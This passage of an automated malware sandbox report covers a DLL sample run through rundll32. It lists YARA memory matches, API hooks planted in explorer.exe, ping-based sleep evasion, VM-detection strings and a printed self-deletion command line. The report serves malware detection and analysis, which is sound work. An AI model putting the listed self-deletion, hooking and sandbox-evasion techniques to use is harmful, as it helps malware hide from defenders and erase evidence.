                      Source: Yara matchFile source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.1350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57a6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57794a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the prolog of user mode functions (user mode inline hooks)
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll
                      Modifies the export address table of user mode modules (user mode EAT hooks)
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FF80250521C
                      Modifies the import address table of user mode modules (user mode IAT hooks)
                      Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FF802505200
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3184Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 2896Thread sleep time: -1773297476s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5974
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1268
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: explorer.exe, 00000023.00000000.414345996.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000023.00000000.449700095.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 00000023.00000000.451220379.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000023.00000000.413803782.0000000005137000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: rundll32.exe, 00000002.00000002.453537625.00000000034AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx3R
                      Source: rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000023.00000000.449700095.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000023.00000000.452210061.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
